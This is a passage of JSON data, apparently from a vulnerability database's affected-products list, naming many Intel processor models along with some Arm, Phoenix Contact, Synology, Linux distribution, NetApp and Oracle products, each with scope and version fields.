"model": "xeon e5 1620 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2910" }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j2900" }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1585_v5" }, { "model": "xeon e3 1105c v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1265l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8550u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "530" }, { "model": "xeon e5 2428l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4809_v2" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4160t" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2308" }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3060" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6157u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2430m" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8160" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8890_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2500" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "330m" }, { "model": "xeon e3 12201 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x3470" }, { "model": "xeon e3 1230", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2680" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6138t" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5118" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "540um" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "930" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4550u" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8350k" }, { "model": "bl2 ppc 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2850_v2" }, { "model": "bl bpc 2000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "atom x3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3235rk" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2390t" }, { "model": "dl ppc15 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8170" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "350m" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2538" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5520" }, { "model": "xeon e5 2418l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8176f" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7700t" }, { "model": "solidfire", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "390m" }, { "model": "xeon e3 1290 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "330um" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2940" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2649m" }, { "model": "router manager", "scope": "lt", "trust": 1.0, "vendor": "synology", "version": "1.1.7-6941-1" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n4200" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4110" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697_v2" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5504" }, { "model": "xeon e3 1245 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5508" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3820qm" }, { "model": "xeon e3 1280 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1281 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2100" }, { "model": "diskstation manager", "scope": "gte", "trust": 1.0, "vendor": "synology", "version": "5.2" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2560" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8156" }, { "model": "xeon e3 1268l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3455" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2960xm" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850_v4" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4020y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7820eq" }, { "model": "core m", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5y51" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5520" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5300u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2687w" }, { "model": "xeon e5 1660", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "bl rackmount 4u", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e5 1680 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5506" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5649" }, { "model": "xeon e3 1275 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4150t" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6130" }, { "model": "xeon e5 2420", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4790" }, { "model": "xeon e3 1230 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "660" }, { "model": "bl ppc17 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6402p" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4860" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4603_v2" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8830" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3330" }, { "model": "xeon e5 1428l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3470s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2720qm" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "ec5539" }, { "model": "xeon e5 1660 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4800mq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3540m" }, { "model": "xeon e3 1505m v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j1800" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4603" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5675r" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4650" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2350" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2758" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3338" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3225" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2860" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4860hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5775c" }, { "model": "cortex-r8", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "pentium j", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "j3710" }, { "model": "pentium n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3520" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3439y" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3570k" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7y75" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4278u" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2820" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3537u" }, { "model": "core m5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y57" }, { "model": "xeon e3 1271 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1286 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8700" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4648_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5675c" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "480m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "740qm" }, { "model": "core m3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7y32" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4950hq" }, { "model": "xeon e3 1286l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2657m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8400" }, { "model": "xeon phi", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7290" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3530" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "610e" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5700eq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2620m" }, { "model": "xeon bronze 3104", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1230 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1280 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5119t" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6148f" }, { "model": "linux enterprise desktop", "scope": "eq", "trust": 1.0, "vendor": "suse", "version": "12" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3150" }, { "model": "bl ppc17 3000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3110m" }, { "model": "xeon e3 1270 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620le" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "950" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2658a_v3" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2328m" }, { "model": "xeon e5 2630", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e3 1225 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4620_v4" }, { "model": "neoverse n2", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "560" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "661" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "380um" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "650" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5120" }, { "model": "xeon e3 1240l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4130t" }, { "model": "xeon e5 2630 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3120m" }, { "model": "bl2 ppc 2000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3000" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3520m" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5675" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640_v3" }, { "model": "xeon e5 1428l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2608l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5775r" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4640" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3308" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2697_v3" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5640" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4150" }, { "model": "bl2 bpc 2000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "7820hk" }, { "model": "vl2 bpc 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "1565l_v5" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8857_v2" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6440hq" }, { "model": "router manager", "scope": "gte", "trust": 1.0, "vendor": "synology", "version": "1.1" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2670_v2" }, { "model": "xeon e5 2620 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2400" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l3426" }, { "model": "xeon e3 12201", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4308u" }, { "model": "xeon platinum", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8168" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3758" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4330" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "760" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2650l_v4" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4830_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4578u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8870_v4" }, { "model": "xeon e3 1505l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "965" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "940" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4100e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2540m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4210u" }, { "model": "xeon e5 2418l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5120t" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4870_v2" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4702ec" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2807" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c2730" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3630qm" }, { "model": "xeon e5 2640 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770t" }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3958" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4765t" }, { "model": "el ppc 1000\\/wt", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "atom c", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "c3508" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8890_v2" }, { "model": "xeon e5 2608l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "local service management system", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "13.1" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "550" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3220t" }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4109t" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n3010" }, { "model": "xeon e3 1285l v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4690k" }, { "model": "cortex-a8", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2105" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4510u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2660_v4" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4770k" }, { "model": "vl2 bpc 9000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "xeon e3 1268l v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2815" }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2808" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3217ue" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3250t" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8100" }, { "model": "xeon e5 1650 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "bl ppc 7000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3845" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4660_v4" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6167u" }, { "model": "bl2 bpc 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2515e" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5157u" }, { "model": "xeon gold", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6138" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4610y" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3337u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "580m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "750" }, { "model": "xeon e5 1428l v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3240t" }, { "model": "xeon e5 2650l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4910mq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3740qm" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4870hq" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3785" }, { "model": "xeon e5 2630 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4025u" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4430s" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2635qm" }, { "model": "xeon e3 1285 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2630l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3229y" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4102e" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "x5667" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2690_v3" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4820" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3770t" }, { "model": "xeon e5 2628l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8867_v4" }, { "model": "cortex-a12", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4850" }, { "model": "xeon e3 1258l v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4302y" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "330e" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3339y" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4710hq" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8700k" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e5645" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8650u" }, { "model": "xeon e3 1220 v2", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon silver", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4116t" }, { "model": "bl ppc15 1000", "scope": "eq", "trust": 1.0, "vendor": "phoenixcontact", "version": null }, { "model": "cortex-a78", "scope": "eq", "trust": 1.0, "vendor": "arm", "version": null }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3240" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2557m" }, { "model": "core m7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6y75" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "380m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2450m" }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "620lm" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "l5506" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8867_v3" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6267u" }, { "model": "xeon", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e7540" }, { "model": "xeon e3 1260l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "core i7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "3840qm" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "5250u" }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2695_v2" }, { "model": "ubuntu linux", "scope": "eq", "trust": 1.0, "vendor": "canonical", "version": "12.04" }, { "model": "core i3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2357m" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "4670k" }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z2760" }, { "model": "xeon e3 1225 v5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "celeron n", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "n2930" }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3825" }, { "model": "xeon e3 1245 v6", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2609 v4", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5 2643", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "xeon e5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "2695_v4" }, { "model": "xeon e5 2448l", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom e", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "e3805" }, { "model": "xeon e5 2609 v3", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "atom z", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "z3580" }, { "model": "core i5", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "6287u" }, { "model": "xeon e7", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": "8860_v3" }, { "model": "xeon e5 1660 v2", "scope": "eq", "trust": 